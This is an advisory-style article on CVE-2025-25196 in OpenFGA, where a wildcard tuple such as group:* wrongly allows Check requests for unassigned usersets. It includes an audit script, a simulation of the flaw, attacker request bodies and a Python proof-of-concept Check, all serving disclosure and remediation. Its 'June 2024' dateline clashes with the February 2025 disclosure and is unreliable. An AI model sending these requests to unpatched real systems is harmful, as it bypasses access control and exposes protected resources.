---

Exclusive Long Read | June 2024

OpenFGA is increasingly popular among developers for permission and authorization solutions. Inspired by Google Zanzibar, it offers flexible, fine-grained access control for modern applications. On February 19, 2025, however, a security vulnerability, CVE-2025-25196, was disclosed: in certain model and tuple configurations a Check request for a userset can return allowed even though no tuple grants that userset access to the resource.

This vulnerability is relevant for all maintainers and users running OpenFGA versions earlier than v1.8.4 (Helm chart earlier than openfga-0.2.22, Docker image earlier than v1.8.4). This deep dive explains the vulnerability in simple terms, shows how it can be triggered, and provides remediation advice.

What Is OpenFGA?

OpenFGA stands for "Open Fine-Grained Authorization." It is an open-source, relationship-based authorization engine built to scale, which lets an application ask whether a given user has a given relation (permission) to a specific object.

Access in OpenFGA is managed through three core concepts:

- Model: The authorization model declares the object types (e.g., user, group, doc), the relations each type has (e.g., viewer, editor), and which user types may be directly assigned to each relation, including type-bound public access (user:*) and usersets (group#member).
- Tuple: A relationship tuple assigns a user, a userset, or a wildcard to an object through a relation, for example doc:doc1#editor@user:alice (alice is an editor of doc1).
- Check/ListObjects: Check answers whether a given user has a relation to a given object; ListObjects lists the objects of a type on which the user has that relation.

Learn more about OpenFGA in their official docs.

You are affected if all of these are true:

1. You run OpenFGA earlier than v1.8.4, that is v1.8.3 or older (this includes Helm chart versions earlier than openfga-0.2.22 and Docker images earlier than v1.8.4).
2. A type-bound public access tuple is assigned to an object for some relation (e.g., doc:doc1#viewer@group:*, which makes every object of type group a viewer of doc1).
3. No tuple assigns the userset in question to that object (e.g., there is no doc:doc1#viewer@group:managers#member, so the members of the managers group were never granted access).
4. A Check request is made whose user is that userset (e.g., group:managers#member), and the userset's object type (group) is the same type as the public access tuple's wildcard (group:*).
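The four conditions above can be checked mechanically against a model and its tuples. The following audit script is an added example written for this article, not part of OpenFGA or its tooling: it reads the directly assignable type restrictions out of a schema 1.1 model (only the "define rel: [...]" form is parsed), finds relations that accept both a type-bound wildcard and a userset of the same type, and then reports which (object, relation, userset) combinations a vulnerable server would wrongly allow. The model and tuples are constructed sample data.

```python
import re

# Constructed sample model (OpenFGA DSL, schema 1.1). doc#viewer accepts both
# the wildcard group:* and the userset group#member, i.e. a wildcard and a
# userset of the same type, which is the combination the conditions describe.
SAMPLE_MODEL = """
model
  schema 1.1

type user

type group
  relations
    define member: [user]

type doc
  relations
    define viewer: [group:*, group#member]
    define editor: [user]
"""

# Constructed sample tuples as (object, relation, user). doc1 carries the
# wildcard but no userset tuple; doc2 carries both.
SAMPLE_TUPLES = [
    ("doc:doc1", "viewer", "group:*"),
    ("doc:doc2", "viewer", "group:managers#member"),
    ("doc:doc2", "viewer", "group:*"),
    ("doc:doc3", "editor", "user:alice"),
]

TYPE_RE = re.compile(r"^\s*type\s+(\w+)\s*$")
DEFINE_RE = re.compile(r"^\s*define\s+(\w+)\s*:\s*\[([^\]]*)\]")


def parse_direct_types(model_dsl):
    """Map (object_type, relation) -> list of directly assignable restrictions.

    Computed relations (define x: y or z) carry no restriction list and are
    irrelevant here, so they are skipped.
    """
    direct = {}
    current_type = None
    for line in model_dsl.splitlines():
        m = TYPE_RE.match(line)
        if m:
            current_type = m.group(1)
            continue
        m = DEFINE_RE.match(line)
        if m and current_type:
            restrictions = [r.strip() for r in m.group(2).split(",") if r.strip()]
            direct[(current_type, m.group(1))] = restrictions
    return direct


def risky_relations(direct):
    """(object_type, relation, T) for relations that accept both T:* and T#rel."""
    out = []
    for (otype, rel), restrictions in direct.items():
        wildcard_types = {r[:-2] for r in restrictions if r.endswith(":*")}
        userset_types = {r.split("#", 1)[0] for r in restrictions if "#" in r}
        for t in sorted(wildcard_types & userset_types):
            out.append((otype, rel, t))
    return out


def exposed_objects(model_dsl, tuples):
    """Objects that actually carry a T:* tuple on a risky relation (condition 2)."""
    risky = {(o, r): t for o, r, t in risky_relations(parse_direct_types(model_dsl))}
    found = set()
    for obj, rel, user in tuples:
        t = risky.get((obj.split(":", 1)[0], rel))
        if t is not None and user == f"{t}:*":
            found.add((obj, rel, t))
    return found


def wrongly_allowed(obj, rel, user, model_dsl, tuples):
    """True if a vulnerable server would allow this Check without a granting tuple.

    Requires the user to be a userset of the wildcard's type (condition 4) on an
    exposed object (condition 2) with no tuple for that userset (condition 3).
    """
    if "#" not in user:
        return False  # a plain user or object: the wildcard legitimately applies
    userset_type = user.split(":", 1)[0]
    if (obj, rel, userset_type) not in exposed_objects(model_dsl, tuples):
        return False
    return (obj, rel, user) not in set(tuples)


def audit(model_dsl, tuples, candidate_usersets):
    """Sorted (object, relation, userset) triples a vulnerable server wrongly allows."""
    return sorted(
        (obj, rel, us)
        for (obj, rel, _t) in exposed_objects(model_dsl, tuples)
        for us in candidate_usersets
        if wrongly_allowed(obj, rel, us, model_dsl, tuples)
    )


if __name__ == "__main__":
    for hit in audit(SAMPLE_MODEL, SAMPLE_TUPLES, ["group:managers#member", "group:finance#member"]):
        print("vulnerable Check would allow:", hit)
```

The candidate usersets are supplied explicitly because the wildcard exposes every userset of that type, assigned or not; in a real store you would feed it the group (or other) objects that exist, read through the Read API, and treat every reported triple as a Check result you cannot trust until the server is upgraded.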

What’s the Impact?

In affected OpenFGA versions, a Check whose user is a userset (e.g., group:managers#member) that has no tuple on the object can still return allowed, provided the object carries a type-bound public access tuple whose type matches the userset's object type (group:* in the example). The permission-checking logic treats the userset as if the wildcard covered it. Any application that performs userset checks, or lets callers influence the user in a Check request, will therefore grant access that the tuples never authorized.

Suppose your OpenFGA model (with a user type and a group type whose member relation is directly assignable by user) defines the viewer relation on doc so that it accepts both a type-bound wildcard and a userset of the same type:

type doc
  relations
    define viewer: [group:*, group#member]

You assign:

doc:doc1#viewer@group:*                 # type-bound public access: every group is a viewer of doc1
# doc:doc1#viewer@group:managers#member (NOT assigned!)

*Note: the userset group:managers#member (the members of the managers group) is not assigned to doc1.*

A Check is issued for that userset (an application that passes usersets as the subject, or a caller who can choose the subject, can produce it):

POST /stores/{store_id}/check
{
  "tuple_key": {
    "object": "doc:doc1",
    "relation": "viewer",
    "user": "group:managers#member"
  }
}

Vulnerable versions of OpenFGA incorrectly return "allowed": true, meaning that group:managers#member (every member of the managers group) is treated as authorized through the public access tuple, even though that userset was never assigned. A fixed version returns false: the wildcard group:* stands for objects of type group, not for the set of users in group:managers#member.

Why Does This Happen?

Under the hood, OpenFGA fails to properly distinguish between a type-bound public access tuple and a userset tuple *of the same type*. Because group:managers#member begins with the group type, the wildcard group:* is treated as covering it, although the wildcard covers objects of type group and a userset is a set of users, not an object. A public assignment therefore lets a Check for a userset that was never assigned succeed, bypassing the intended restriction.

An attacker who can influence the user field of a Check request (for example through an application that lets clients name the subject, or that performs userset checks on the client's behalf) exploits this by sending:

{
  "object": "doc:doc1",
  "relation": "viewer",
  "user": "group:managers#member"
}

Instead of

{
  "object": "doc:doc1",
  "relation": "viewer",
  "user": "user:eve"
}

The request for user:eve is correctly denied (no tuple grants her access, and her type, user, does not match the group:* wildcard), yet the request for group:managers#member returns "allowed": true on vulnerable versions even though that userset was never given access: the public access tuple is misapplied to it.
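To make the two behaviours concrete, the following is an added example for this article, not OpenFGA's resolver code: a small in-memory check function over constructed tuples with a vulnerable flag. The vulnerable path models the flaw as described above, matching the type-bound wildcard on the type prefix of the request's user even when that user is a userset; the fixed path applies the wildcard only to direct, non-userset users. How OpenFGA implements the wildcard lookup internally is not something this page documents, so the vulnerable branch is an approximation of the described behaviour, not a copy of the real code.

```python
# Constructed tuples for the example store as (object, relation, user):
# doc1 carries the wildcard only, doc2 legitimately grants the managers
# userset, and eve is a member of group:managers. The graph is acyclic, so
# the recursive walk below terminates (a real resolver also tracks cycles).
TUPLES = {
    ("doc:doc1", "viewer", "group:*"),
    ("doc:doc2", "viewer", "group:managers#member"),
    ("group:managers", "member", "user:eve"),
}


def is_userset(user):
    """group:managers#member is a userset; user:eve and group:managers are objects."""
    return "#" in user


def object_type(user):
    return user.split(":", 1)[0]


def has_tuple(obj, rel, user):
    return (obj, rel, user) in TUPLES


def check(obj, rel, user, vulnerable):
    """Return True if `user` has relation `rel` on `obj`.

    vulnerable=True reproduces the described flaw: the wildcard T:* is matched on
    the type prefix of the request's user alone, so the userset
    group:managers#member is taken to be covered by group:*.
    vulnerable=False applies the wildcard only to direct (non-userset) users.
    """
    # 1. An exact tuple for this user (or userset) settles it.
    if has_tuple(obj, rel, user):
        return True
    # 2. Type-bound public access tuple. A userset T:x#rel is a set of users,
    #    not an object of type T, so the fixed path skips it for usersets.
    wildcard = f"{object_type(user)}:*"
    if (vulnerable or not is_userset(user)) and has_tuple(obj, rel, wildcard):
        return True
    # 3. Userset tuples on the object: expand each one and recurse, so that
    #    user:eve is a viewer of doc2 through group:managers#member.
    for (o, r, u) in TUPLES:
        if o == obj and r == rel and is_userset(u):
            userset_obj, userset_rel = u.split("#", 1)
            if check(userset_obj, userset_rel, user, vulnerable):
                return True
    return False


if __name__ == "__main__":
    for vulnerable in (True, False):
        print("vulnerable" if vulnerable else "fixed",
              "doc:doc1#viewer@group:managers#member ->",
              check("doc:doc1", "viewer", "group:managers#member", vulnerable))
```

Note what stays the same in both modes: user:eve is denied on doc1 (her type does not match group:*), the object group:finance is allowed on doc1 (it really is an object of type group), and eve is allowed on doc2 through her group membership. Only the Check whose subject is a userset of the wildcard's type changes, which is exactly the affected case.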

Here's a *simple Python* example using requests (it assumes OpenFGA listening on localhost:8080 without authentication; set STORE_ID to your store's ID):

import requests

# The Check endpoint is scoped to a store: /stores/{store_id}/check
STORE_ID = "<your-store-id>"
openfga_url = f"http://localhost:8080/stores/{STORE_ID}/check"

payload = {
    "tuple_key": {
        "object": "doc:doc1",
        "relation": "viewer",
        "user": "group:managers#member"  # userset, not assigned to doc1
    }
}

r = requests.post(openfga_url, json=payload, timeout=10)
r.raise_for_status()
if r.json().get("allowed"):
    print("Unauthorized access granted due to CVE-2025-25196!")
else:
    print("Access denied as expected.")

Remediation

There are no workarounds; upgrading is required. Move to OpenFGA v1.8.4 or later (Helm chart openfga-0.2.22 or later, Docker image v1.8.4 or later).

Remove old containers/images after upgrading, confirm that every replica is running the new version, and re-run the Check above for the userset: it must now return "allowed": false.

Changelog and fix:
- Release notes v1.8.4
- GitHub Security Advisory for CVE-2025-25196

References

- OpenFGA Main Site
- OpenFGA CVE Advisory
- Google Zanzibar Paper
- GitHub Security Advisories

Stay up to date—subscribe to OpenFGA announcements.

*This article is exclusive and based on public sources and real-world testing. Stay secure!*

Timeline

Published on: 02/19/2025 21:15:15 UTC